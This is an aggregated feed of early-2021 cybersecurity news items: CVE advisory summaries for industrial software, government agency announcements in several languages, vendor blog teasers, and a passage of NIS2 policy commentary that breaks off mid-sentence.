https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-vulnerability-coordination-nutshell
NCSC-FI vulnerability coordination in a nutshell
2021-04-01T08:01:00Z | 1617264060

In this fourth part of our series of articles on vulnerabilities, we take a look at the National Cyber Security Centre Finland’s vulnerability coordination through example cases.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-vulnerability-coordination-nutshell
Centro Nacional de Cibersegurança lança nova edição do curso Cidadão Ciberseguro
2021-04-01T00:00:00Z | 1617235200

À semelhança da anterior edição, os formandos serão confrontados com vários conteúdos e exercícios sobre os comportamentos “saudáveis” a adotar, tendo em conta o tema da navegação segura no ciberespaço. O curso e-learning está dividido em três módulos (casa, trabalho e exterior), com quatro tópicos cada (Identidade, Redes e Navegação, Comportamento Social e Trabalho) e inclui uma avaliação final. Recorde-se que Curso Cidadão Ciberseguro visa garantir ao cidadão um conjunto de competências que o permitam sentir-se apto a navegar de forma segura, reduzindo a sua exposição aos riscos do ciberespaço. Para obter acesso ao curso e conhecer esta edição, aceda aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135534/centro-nacional-de-ciberseguranca-lanca-nova-edicao-do-curso-cidadao-ciberseguro
CVE-2021-27476
2021-04-01T00:00:00Z | 1617235200

OS COMMAND INJECTION CWE-78 A vulnerability exists in the SaveConfigFile function of the RACompare Service, which may allow for OS command injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27476
CVE-2021-27474
2021-04-01T00:00:00Z | 1617235200

USE OF POTENTIALLY DANGEROUS FUNCTION CWE-676 FactoryTalk AssetCentre does not properly restrict all functions relating to IIS remoting services. This vulnerability may allow a remote, unauthenticated attacker to modify sensitive data in FactoryTalk AssetCentre.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27474
CVE-2021-27470
2021-04-01T00:00:00Z | 1617235200

DESERIALIZATION OF UNTRUSTED DATA CWE-502 A deserialization vulnerability exists in how the LogService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27470
CVE-2021-27472
2021-04-01T00:00:00Z | 1617235200

SQL INJECTION CWE-89 A vulnerability exists in the RunSearch function of SearchService service, which may allow for the execution of remote unauthenticated arbitrary SQL statements. Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-2747
CVE-2021-27468
2021-04-01T00:00:00Z | 1617235200

SQL INJECTION CWE-89 The AosService.rem service exposes functions lacking proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27468
CVE-2021-27466
2021-04-01T00:00:00Z | 1617235200

DESERIALIZATION OF UNTRUSTED DATA CWE-502 A deserialization vulnerability exists in how the ArchiveService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27466
CVE-2021-27464
2021-04-01T00:00:00Z | 1617235200

SQL INJECTION CWE-89 The ArchiveService.rem service exposes functions lacking proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27464
CVE-2021-27462
2021-04-01T00:00:00Z | 1617235200

DESERIALIZATION OF UNTRUSTED DATA CWE-502 A deserialization vulnerability exists in how the AosService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre. Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27462
CVE-2021-27460
2021-04-01T00:00:00Z | 1617235200

DESERIALIZATION OF UNTRUSTED DATA CWE-502 FactoryTalk AssetCentre components contain .NET remoting endpoints that deserialize untrusted data without sufficiently verifying that the resulting data will be valid. This vulnerability may allow a remote, unauthenticated attacker to gain full access to the FactoryTalk AssetCentre main server and all agent machines.Read more: Critical Vulnerabilities Found in Rockwell FactoryTalk AssetCentre

https://claroty.com/team82/disclosure-dashboard/cve-2021-27460
RIS infokiri – märts 2021
2021-03-31T12:33:21Z | 1617194001

Infokirjas on juttu e-lahenduste realiseerimisest, riikliku postkasti automaatsest edasisuunamisest, riiklike e-teenuste uuringust, elupäästvast ITst, ID-kaardi brauseripluginast ja uuest infoturbestandaridst E-ITS.

https://ria.ee/uudised/ris-infokiri-marts-2021
Elanike riiklik postkast eesti.ee suunati automaatselt edasi
2021-03-31T08:19:38Z | 1617178778

Riigi infosüsteemi amet suunas riigiportaalis eesti.ee asuva riikliku postkasti elanike rahvastikuregistris märgitud e-posti aadressidele, mille tulemusena on nüüd suunatud ligi 1,3 miljonit postkasti. Suunamine tehti vaid neil elanikel, kes seda ise ei olnud teinud.

https://ria.ee/uudised/elanike-riiklik-postkast-eestiee-suunati-automaatselt-edasi
2021: Volumetric DDoS Attacks Rising Fast
2021-03-31T04:00:00Z | 1617163200

In our 2020 DDoS retrospective, we highlighted the twists and turns of a very, very active threat landscape. As a quick refresher, we mitigated some of the largest attacks ever seen (1.44 Tbps and 809 Mpps);

https://www.akamai.com/blog/security/2021-volumetric-ddos-attacks-rising-fast
FIRST POST: March 2021
2021-03-31T00:00:00Z | 1617148800

33rd FIRST Annual Conference: Crossing Uncertain Times; Mark your calendars: FIRST reveals 2021 events calendar; FIRST welcomes its 97th country and member 562: Benin bjCSIRT; FIRST, ITU and Equals launches Women in Cyber Mentorship Program for Arab and Africa Regions; Get your nominations in for the third edition of The Incident Response Hall of Fame; New Podcast - FIRST Impressions - is launched!

https://www.first.org/newsroom/newsletters/FIRST_POST_Mar2021.pdf
Accusoft ImageGear SGI format buffer size processing out-of-bounds write vulnerability
2021-03-30T00:00:00Z | 1617062400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1244
Accusoft ImageGear SGI Format Buffer Size Processing out-of-bounds write vulnerability
2021-03-30T00:00:00Z | 1617062400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1232
Accusoft ImageGear TIFF Header count processing out-of-bounds write vulnerability
2021-03-30T00:00:00Z | 1617062400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1227
4 Helpful Features for Centra Users - Policy Monitoring and More
2021-03-29T13:00:00Z | 1617022800

https://www.akamai.com/blog/security/guardicore-4-helpful-features-for-centra-users
Esimene ettevõtja sündmusteenus otsib tegijat
2021-03-29T12:49:33Z | 1617022173

Majandus- ja Kommunikatsiooniministeerium koos Riigi Infosüsteemi Ametiga kuulutasid välja hanke, mille eesmärk on koondada ettevõtjatele vajalik info ja teenused riigiportaali eesti.ee. Hanke raames otsitakse ettevõtete volituste haldamise süsteemi analüüsi läbiviijat.

https://ria.ee/uudised/esimene-ettevotja-sundmusteenus-otsib-tegijat
High Threat Security Alert (A21-03-10): Vulnerability in Apple iOS and iPadOS
2021-03-29T04:00:00Z | 1616990400

Apple has released iOS 14.4.2 and iPadOS 14.4.2 as well as iOS 12.5.2 to fix a vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
IntelMQ bug fix release 2.3.1
2021-03-26T12:51:37Z | 1616763097

This release does not add any major features to IntelMQ but is considered purely a maintenance release. It addresses some minor errors and contains usability enhancements for the new API. Some notable changes are listed below. Below we present a short summary of the changes. We thank all contributors who participated in this release! As usual, the installation and upgrade instructions can be found on intelmq.readthedocs.io and the full changelogs can be seen on GitHub: IntelMQ 2.3.1, IntelMQ API 2.3.1 & IntelMQ Manager 2.3.1. The Cymru CAP Parser has been adapted to accommodate for the new format for events of the category "bruteforce" (by Sebastian Wagner, CERT.at). The Shodan Parser now supports nested conversions, improved protocol detection and has a greatly extended parser mapping (by Mikk Margus Möll, CERT.EE). A missing description for the Shodan Country Stream has been added to the feed documentation (by Sebastian Wagner, CERT.at). The sections on intelmq-cb-mailgen and fody in the ecosystem document received revised (by Bernhard Reiter, Intevation) and a new summary of hardware requirements has been added (by Sebastian Wagner, CERT.at). IntelMQ API-related changes The IntelMQ API documentation now has more details on the required write permission for the session database file (by Birger Schacht, CERT.at). The API backend now gives a more verbose error message for session database permission errors including a hint for resolution (by Birger Schacht, CERT.at). The intelmqsetup tool, which is part of the installation routine for manual IntelMQ installations, is now able to automatically create the required directory layout and file permissions for the IntelMQ API (by Sebastian Wagner, CERT.at) and also covers the webserver and sudoers configuration for IntelMQ API and IntelMQ Manager (by Sebastian Wagner, CERT.at). IntelMQ Manager-related changes The required authentication token in save-data requests of the "Configuration" tab is now sent to the backend (by Marcos Gonzalez, CNCSRD-DO). In the following two locations, link destinations that still pointed to the old PHP-based backend URLs have been fixed: "Clear Configuration" link destination on the configuration page and the link to the bots configuration on the monitor page (by Sebastian Wagner, CERT.at). This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/3/intelmq-bug-fix-release-231
Critical Exchange vulnerability: alert level lowered to yellow
2021-03-26T11:28:38Z | 1616758118

On 3 March, we issued a red alert regarding vulnerable Exchange servers. While the acute phase is now behind us, organisations that have used or are currently using Exchange must conduct an information security investigation.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/Varoitus_TTN_0221
Critical Exchange vulnerability: alert level lowered to yellow
2021-03-26T11:28:38Z | 1616758118

On 3 March, we issued a red alert regarding vulnerable Exchange servers. While the acute phase is now behind us, organisations that have used or are currently using Exchange must conduct an information security investigation.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/Varoitus_TTN_0221
CVE-2020-15915 -- Quest for KACE blind SQLi
2021-03-26T04:00:00Z | 1616731200

At Akamai, the Enterprise Security Red Team (ESRT) continuously strives to evaluate the security of both our external and internal services.

https://www.akamai.com/blog/security/cve-2020-15915-quest-for-kace-blind-sqli
Security Alert (A21-03-09): Multiple Vulnerabilities in Cisco Products
2021-03-25T04:00:00Z | 1616644800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Threat Intelligence Feeds and Endpoint Protection Systems Fail to Detect 24 Malicious Chrome Extensions
2021-03-24T14:10:16Z | 1616595016

Network data from hundreds of Cato customers suggests malware communication persists despite the use of legacy security controls, services, and detection methods Cato Research Labs released new findings today identifying 24 malicious Chrome extensions and 40 malicious domains, all previously thought to be benign. Some extensions simply introduced adware, but others stole user credentials and... The post Threat Intelligence Feeds and Endpoint Protection Systems Fail to Detect 24 Malicious Chrome Extensions appeared first on Cato Networks.

https://www.catonetworks.com/blog/threat-intelligence-feeds-and-endpoint-protection-systems-fail-to-detect-24-malicious-chrome-extensions/
Security Alert (A21-03-08): Multiple vulnerabilities in Firefox
2021-03-24T04:00:00Z | 1616558400

Mozilla has published the advisories (MFSA 2021-10 and MFSA 2021-11) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Focused on What's Next Following New Traffic Milestone
2021-03-24T04:00:00Z | 1616558400

Akamai hit a new milestone last week when web traffic delivered across our edge network peaked at 200 terabits per second (Tbps).

https://www.akamai.com/blog/trends/Blog
Authentication: Lessons Learned From Microsoft Exchange And F5 Big-IP Hacks
2021-03-24T04:00:00Z | 1616558400

The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks.

https://www.akamai.com/blog/news/authentication-lessons-learned-from-microsoft-exchange-and-f5
The Akamai Foundation: Our Chance to Give Back
2021-03-24T04:00:00Z | 1616558400

The Akamai Foundation was set up in 2018 to improve the impact and focus of our long-term philanthropic activities.

https://www.akamai.com/blog/culture/akamai-foundation-our-chance-to-give-back-by-kim-salem-jackson
Genivia gSOAP WS-Addressing plugin code execution vulnerability redux
2021-03-24T00:00:00Z | 1616544000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1245
A Year in the Life of a Compiler Fuzzing Campaign
2021-03-23T15:00:37Z | 1616511637

In the summer of 2020, we described our work fuzzing the Solidity compiler, solc. So now we’d like to revisit this project, since fuzzing campaigns tend to “saturate,” finding fewer new results over time. Did Solidity fuzzing run out of gas? Is fuzzing a high-stakes project worthwhile, especially if […]

https://blog.trailofbits.com/2021/03/23/a-year-in-the-life-of-a-compiler-fuzzing-campaign/
Threat Advisory - DCCP for (D)DoS
2021-03-23T04:00:00Z | 1616472000

Recent attacks against Akamai customers have leveraged a networking protocol known as protocol 33, or Datagram Congestion Control Protocol (DCCP).

https://www.akamai.com/blog/security/threat-advisory-dccp-for-ddos
CVE-2021-22648
2021-03-23T00:00:00Z | 1616457600

INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732 The TBox proprietary Modbus file access functions allow attackers to read, alter, or delete the configuration file.Read more: Claroty Uncovers Vulnerabilities in Ovarro TBox RTUs

https://claroty.com/team82/disclosure-dashboard/cve-2021-22648
CVE-2021-22646
2021-03-23T00:00:00Z | 1616457600

IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94 The "ipk" package containing the configuration created by TWinSoft can be uploaded, extracted, and executed in the TBox, allowing malicious code execution.Read more: Claroty Uncovers Vulnerabilities in Ovarro TBox RTUs

https://claroty.com/team82/disclosure-dashboard/cve-2021-22646
CVE-2021-22644
2021-03-23T00:00:00Z | 1616457600

USE OF HARD-CODED CRYPTOGRAPHIC KEY CWE-321 TWinSoft uses the custom hardcoded user "TWinSoft" with a hardcoded key.Read more: Claroty Uncovers Vulnerabilities in Ovarro TBox RTUs

https://claroty.com/team82/disclosure-dashboard/cve-2021-22644
CVE-2021-22642
2021-03-23T00:00:00Z | 1616457600

UNCONTROLLED RESOURCE CONSUMPTION CWE-400 An attacker could use specially crafted invalid Modbus frames to crash the system.Read more: Claroty Uncovers Vulnerabilities in Ovarro TBox RTUs

https://claroty.com/team82/disclosure-dashboard/cve-2021-22642
CVE-2021-22640
2021-03-23T00:00:00Z | 1616457600

INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522 An attacker can decrypt the login password by communication capture and brute force attacks.Read more: Claroty Uncovers Vulnerabilities in Ovarro TBox RTUs

https://claroty.com/team82/disclosure-dashboard/cve-2021-22640
Juulist juhib RIA küberturvalisuse teenistust Gert Auväärt
2021-03-22T12:25:28Z | 1616415928

15. juulist asub küberturvalisuse teenistust juhtima ÜRO Eesti alalise esinduse asejuht Gert Auväärt.

https://ria.ee/uudised/juulist-juhib-ria-kuberturvalisuse-teenistust-gert-auvaart
4 Techniques for Early Ransomware Detection
2021-03-21T18:40:00Z | 1616352000

If you receive a ransom note, it?s already too late. Detect and stop ransomware attacks early in the kill chain with these 4 techniques.

https://www.akamai.com/blog/security/4-techniques-for-early-ransomware-detection
Un-bee-lievable Performance: Fast Coverage-guided Fuzzing with Honeybee and Intel Processor Trace
2021-03-19T14:00:15Z | 1616162415

Today, we are releasing an experimental coverage-guided fuzzer called Honeybee that records program control flow using Intel Processor Trace (IPT) technology. Previously, IPT has been scrutinized for severe underperformance due to issues with capture systems and inefficient trace analyses. My winter internship focused on working through these challenges to make […]

https://blog.trailofbits.com/2021/03/19/un-bee-lievable-performance-fast-coverage-guided-fuzzing-with-honeybee-and-intel-processor-trace/
The Edge is Becoming More Critical in a World of 5G and IoT
2021-03-19T04:00:00Z | 1616126400

The edge is becoming more critical in a world of 5G and IoT. I've seen the evolution from 1x to 3G to 4G and now 5G over the many years I've worked in the mobile space, and 5G and IoT will drive the biggest changes we have seen on the edge in 10 or 20 years.

https://www.akamai.com/blog/edge/the-edge-is-becoming-more-critical-in-a-world-of-5g-and-iot
Akamai Launch Cohort 2 of Accelerator Program For Early-Stage Innovations in Water
2021-03-19T04:00:00Z | 1616126400

Akamai Technologies India Pvt. Ltd. has chosen the grantees for Cohort 2 of Accelerator Program for Early-Stage Innovations in Water.

https://www.akamai.com/blog/culture/akamai-launch-cohort-2-of-accelerator-program-for-early-stage-innovations
[Ep.1] Introducing SASE: The Secure Network for the Digital Business
2021-03-18T11:46:27Z | 1616067987

The post [Ep.1] Introducing SASE: The Secure Network for the Digital Business appeared first on Cato Networks.

https://catonetworks.easywebinar.live/event-registration-54
Riik seob inimese eesti.ee postkasti tema rahvastikuregistris olevate kontaktandmetega
2021-03-18T08:51:44Z | 1616057504

Valitsus kiitis heaks ettevõtlus- ja infotehnoloogiaminister Andres Suti ettepaneku Eesti teabevärava eesti.ee määruse muutmiseks, et edaspidi saaks edastada inimestele eesti.ee kaudu teavitusi nende rahvastikuregistris ametlike kontaktandmetena olevatele e-posti aadressidele ja telefoninumbritele.

https://ria.ee/uudised/riik-seob-inimese-eestiee-postkasti-tema-rahvastikuregistris-olevate-kontaktandmetega
CVE-2021-22681
2021-03-18T00:00:00Z | 1616025600

INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522 Studio 5000 Logix Designer uses a key to verify Logix controllers are communicating with the affected Rockwell Automation products. The product is vulnerable because an unauthenticated attacker could bypass this verification mechanism and authenticate with Logix controllers.Read more: Claroty Discovers Critical Authentication Bypass in Rockwell Software

https://claroty.com/team82/disclosure-dashboard/cve-2021-22681
Remote Access Network Architecture and Security Considerations
2021-03-17T09:02:49Z | 1615971769

The global pandemic spurred a massive work-from-home (WFH) wave quite literally overnight. Hundreds of millions of people worldwide were told to stay home to stay safe, but they needed to keep working as best as possible. Enterprises responded to this sudden need for extensive remote network access by focusing on getting people connected—but connectivity often... The post Remote Access Network Architecture and Security Considerations appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-access-network-architecture-and-security-considerations/
Finding the Cracks in the Wall - How Modern Scams Bypass MFA
2021-03-17T04:00:00Z | 1615953600

In my previous blog, I discussed the important role multi-factor authentication (MFA) plays in further securing access to enterprise and consumer services. We also established the fact that although MFA increases authentication security and decreases the risk of account takeover, MFA can, and is, being bypassed in the wild.

https://www.akamai.com/blog/security/finding-the-cracks-in-the-wall-how-modern-scams-bypass-mfa-blog2
Another Golang Crypto Miner On the Loose
2021-03-16T04:00:00Z | 1615867200

There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs. The binary it captured stood out, as it was rather large at 4MB. I immediately thought it would be a crypto miner written in the Go language. I was correct. This one however, has some newer exploits it's using for proliferation.

https://www.akamai.com/blog/security/another-golang-crypto-miner-on-the-loose
Finding the Cracks in the Wall - The Hazard of Single Authentication Factor
2021-03-16T04:00:00Z | 1615867200

The use of authentication factors, one of the most fundamental and well understood concepts in information security, enables secure access to applications, services, and networks. It can affect an enterprise's security posture, however, as the drastic increase in data breaches and system attacks are largely based on compromised authentication.

https://www.akamai.com/blog/security/finding-the-cracks-in-the-wall-the-hazard-of-single-authentication-factor
Phish-Proof Multi-Factor Authentication with Akamai MFA
2021-03-16T04:00:00Z | 1615867200

Today, Akamai announced Akamai MFA, a phish-proof multi-factor authentication (MFA) service for the workforce that delivers all of the security benefits of FIDO2 with the frictionless end-user experience of a mobile push on a smartphone. Why has Akamai introduced this new service?

https://www.akamai.com/blog/security/phish-proof-multi-factor-authentication-with-akamai-mfa-blog-3
Accusoft ImageGear PSD read_icc_icCurve_data heap-based buffer overflow vulnerability
2021-03-16T00:00:00Z | 1615852800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1264
Never a dill moment: Exploiting machine learning pickle files
2021-03-15T15:06:18Z | 1615820778

Many machine learning (ML) models are Python pickle files under the hood, and it makes sense. The use of pickling conserves memory, enables start-and-stop model training, and makes trained models portable (and, thereby, shareable). Pickling is easy to implement, is built into Python without requiring additional dependencies, and supports serialization of custom […]

https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/
High Threat Security Alert (A21-03-07): Multiple Vulnerabilities in Google Chrome
2021-03-15T04:00:00Z | 1615780800

Google released a security update to address multiple vulnerabilities in the tab groups implementation, the WebRTC and the Blink components of the Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange
2021-03-15T04:00:00Z | 1615780800

On March 2, 2021, the Microsoft Security Response Center alerted its customers to several?critical security?updates to Microsoft Exchange Server, addressing vulnerabilities currently?under attack.

https://www.akamai.com/blog/security/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706
Boletim 1/2021 do Observatório de Cibersegurança já pode ser consultado
2021-03-15T00:00:00Z | 1615766400

A edição em causa identifica as medidas principais desta Estratégia, como é o caso da revisão da Diretiva de Segurança das Redes e Sistemas de Informação ou o alargar de aplicação da diretiva das infraestruturas críticas, e propõe uma perspetiva sobre o contexto desta iniciativa. Além disso, divulga um conjunto de publicações que são consideradas de interesse. Para aceder ao documento, clique aqui

https://dyn.cncs.gov.pt/pt/detalhe/art/135533/boletim-12021-do-observatorio-de-ciberseguranca-ja-pode-ser-consultado
Network Security Solutions to Support Remote Workers and Digital Transformation
2021-03-14T16:31:25Z | 1615739485

Attack surface – noun: The attack surface of an enterprise network environment is the sum of the different points (the attack vectors) where an unauthorized user can try to enter the network to execute a malicious intent, such as stealing data or disrupting operations. A basic security measure is to keep the attack surface as... The post Network Security Solutions to Support Remote Workers and Digital Transformation appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-security-solutions-to-support-remote-workers-and-digital-transformation/
SD-WAN for the Office vs. SASE for Everywhere Ask me Anything
2021-03-14T12:21:06Z | 1615724466

The post SD-WAN for the Office vs. SASE for Everywhere Ask me Anything appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-48
Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool
2021-03-14T05:00:00Z | 1615698000

It's been an interesting start to March in terms of public security incidents. This month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist

https://www.akamai.com/blog/security/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool
SonicWall SMA100 post-authentication configuration export to the a specified email address
2021-03-13T01:19:00Z | 1615598340

A post-authenticated vulnerability in SonicWall SMA100 allows an attacker to export the configuration file to the specified email address. This vulnerability impacts SMA100 version 10.2.0.5 and earlier. CVE: CVE-2021-20018 Last updated: March 13, 2021, 1:19 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0005
SonicWall SMA100 post-authenticated remote command injection
2021-03-13T01:04:54Z | 1615597494

A post-authenticated command injection vulnerability in SonicWall SMA100 allows an authenticated attacker to execute OS commands as a 'nobody' user. This vulnerability impacts SMA100 version 10.2.0.5 and earlier. CVE: CVE-2021-20017 Last updated: March 13, 2021, 1:04 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0004
Update for organisations on Microsoft Exchange Server vulnerabilities
2021-03-12T15:50:16Z | 1615564216

Organisations are advised to take steps to avoid compromise by an increasing range of threat actors.

https://www.ncsc.gov.uk/news/microsoft-exchange-server-vulnerabilities
Information operations are commonplace in today's cyber environment
2021-03-12T12:50:37Z | 1615553437

Consultant and military professor (retired) Mika Hyytiäinen wants to draw attention to the importance of information operations and cooperation in the context of cyber security. In the most recent TIETO20 cyber security exercise, professor Hyytiäinen served as the leader of the red team's information environment. The task of the red team is to challenge the players participating in the exercise by producing inputs to which they must respond. The red team typically consists of the organisers of the exercise or technical specialists invited by them.

https://www.kyberturvallisuuskeskus.fi/en/news/information-operations-are-commonplace-todays-cyber-environment
Information operations are commonplace in today's cyber environment
2021-03-12T12:50:37Z | 1615553437

Consultant and military professor (retired) Mika Hyytiäinen wants to draw attention to the importance of information operations and cooperation in the context of cyber security. In the most recent TIETO20 cyber security exercise, professor Hyytiäinen served as the leader of the red team's information environment. The task of the red team is to challenge the players participating in the exercise by producing inputs to which they must respond. The red team typically consists of the organisers of the exercise or technical specialists invited by them.

https://www.kyberturvallisuuskeskus.fi/en/news/information-operations-are-commonplace-todays-cyber-environment
Lateral movement — what you need to know (part two)
2021-03-12T12:47:32Z | 1615553252

Finland is part of global information networks. As a result, Finland and Finns are targeted by data breaches that use the techniques of lateral movement to obtain increased privileges and create favourable conditions for the attacker. Lateral movement prevention aims to make it more difficult for attackers to achieve their objectives and improve organisations’ capacity to detect data breaches. This Information Security Now! article is the second entry in our series on lateral movement. In it, we provide organisations with guidance on the methods they can use to improve their cyber security and prevent lateral movement. The full article is available in Finnish.

https://www.kyberturvallisuuskeskus.fi/en/news/lateral-movement-what-you-need-know-part-two
Lateral movement — what you need to know (part two)
2021-03-12T12:47:32Z | 1615553252

Finland is part of global information networks. As a result, Finland and Finns are targeted by data breaches that use the techniques of lateral movement to obtain increased privileges and create favourable conditions for the attacker. Lateral movement prevention aims to make it more difficult for attackers to achieve their objectives and improve organisations’ capacity to detect data breaches. This Information Security Now! article is the second entry in our series on lateral movement. In it, we provide organisations with guidance on the methods they can use to improve their cyber security and prevent lateral movement. The full article is available in Finnish.

https://www.kyberturvallisuuskeskus.fi/en/news/lateral-movement-what-you-need-know-part-two
What is OT malware?
2021-03-12T08:52:01Z | 1615539121

How malware works on Operational Technology (OT) and how to stop it.

https://www.ncsc.gov.uk/blog-post/what-is-ot-malware
Akamai Offers Free Tier for Client-Side Edge Security
2021-03-12T05:00:00Z | 1615525200

In March 2020, Akamai saw a dramatic 30% rise in internet traffic -- equivalent to an entire year of growth. Post-pandemic, we believe there will be a return to normal internet traffic growth, but many things will never be the same.

https://www.akamai.com/blog/security/akamai-offers-free-tier-for-client-side-edge-security
Act Against Geopiracy with Enhanced Proxy Detection
2021-03-12T05:00:00Z | 1615525200

According to the description, the service is a virtual private network (VPN) desktop application and proxy browser extension that helps viewers mask their physical location, circumvent censorship, and restore access to blocked content.

https://www.akamai.com/blog/performance/act-against-geopiracy-with-enhanced-proxy-detection
High Threat Security Alert (A21-03-06): Multiple Vulnerabilities in F5 BIG-IP
2021-03-12T04:00:00Z | 1615521600

F5 has published security advisories to address multiple vulnerabilities in F5 devices.

https://www.govcert.gov.hk/en/alerts_detail.php
NIS2 Proposal: First feedback on the normative text
2021-03-10T10:03:51Z | 1615370631

After looking at the recitals a few weeks ago, here is my feedback on the normative text of the NIS2 proposal: Art. 1(2)(c) [...] lays down obligations on cybersecurity information sharing. It doesn't just provide obligations, it also provides a legal basis for information sharing. From our perspective, that's even more important than the obligation. Art. 2(2)(a) the services are provided by one of the following entities: Overall, the NIS2 is moving from the service-orientation towards a focus on organisations. Here, "service" appears and it looks like a holdover from the old text. There is no clear definition on what "services" are covered by the language in all of paragraph 2, leading to potentially absurd interpretations. e.g.: Art. 2(2)(a) (i) + (iii) (i) public electronic communications networks or publicly available electronic communications services referred to in point 8 of Annex I; (iii) top–level domain name registries and domain name system (DNS) service providers referred to in point 8 of Annex I; Let's say that an important entity runs a summer vacation camp for its employees that is connected via a small non-profit (e.g., rural wifi) ISP. Internet connectivity and DNS resolution services at that resort is a service of the entity, making the community-run ISP covered by NIS2. Or: the tennis-club of a larger entity is using dedicated server hosted at a data-centre for a few dozens of € per month. It also runs an authoritative DNS server. Thus, it falls under the NIS2 directive. Art 2(2)(c) the entity is the sole provider of a service in a Member State; Same thing: To be the sole provider of lemon-soaked paper napkins (to quote Douglas Adams) in a country doesn't make you important. The term "service" really needs a "relevant" or "important" or "essential" in front of it. Art. 4(4) 'security of network and information systems’ means the ability of network and information systems to resist, at a given level of confidence, any action that compromises the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the related services offered by, or accessible via, those network and information systems; The word "action" can be read as a human doing something. If we look a the statistics collected by ENISA as part of the Art 13(a) reporting, we see that malicious activity has just a minor impact on the availability of the telecommunication services. If we have the CIA triad in mind, we really have to look far beyond "actions", and also have to include "events" or "circumstances". Art. 4(15) ‘top–level domain name registry’ means an entity which has been delegated a specific TLD and is responsible for administering the TLD including the registration of domain names under the TLD and the technical operation of the TLD, including the operation of its name servers, the maintenance of its databases and the distribution of TLD zone files across name servers; This fixation on TLDs is counter-productive. For example: nic.at allows the creation of new domains under .at, .or.at and .co.at (the latter being legacy second level domains). I see no reason why the regulation should treat those three parent domains differently from each other. Art. 5(2) (missing) National cybersecurity strategies need to address the international engagement and cyber diplomacy aspect, e.g., the standardization efforts of the ITU or the Internet governance by ICANN. Art. 6(2) ENISA shall develop and maintain a European vulnerability registry. As I wrote while discussing the recitals, the world does not need a duplication of the CVE database that is run by MITRE. Please cooperate! Start with acting as a CNA, and offer to act as a backup for the main database. We need globally unique identifiers for vulnerabilities. Art. 7(3) (missing) Please add a bullet on funding. Art. 8(3) Each Member State shall designate one national single point of contact on cybersecurity (‘single point of contact’). Please either restrict the SPoC to a purely administrative function, or just cut it out. It's not needed for operational information sharing. Art. 9(1) Each Member State shall designate one or more CSIRTs which shall comply with the requirements set out in Article 10(1), covering at least the sectors, subsectors or entities referred to in Annexes I and II, and be responsible for incident handling in accordance with a well–defined process. The language could be clearer that the union of the constituencies of the set of CSIRTs needs to be a superset of all the sectors. Maybe use something like "covering together at least the sectors, ...". Art. 10(1)(d) CSIRTs shall be adequately staffed to ensure availability at all times; This could either mean a 24x7 staffed CSIRT office or just a way to alert an CSIRT analyst who is on a on-call 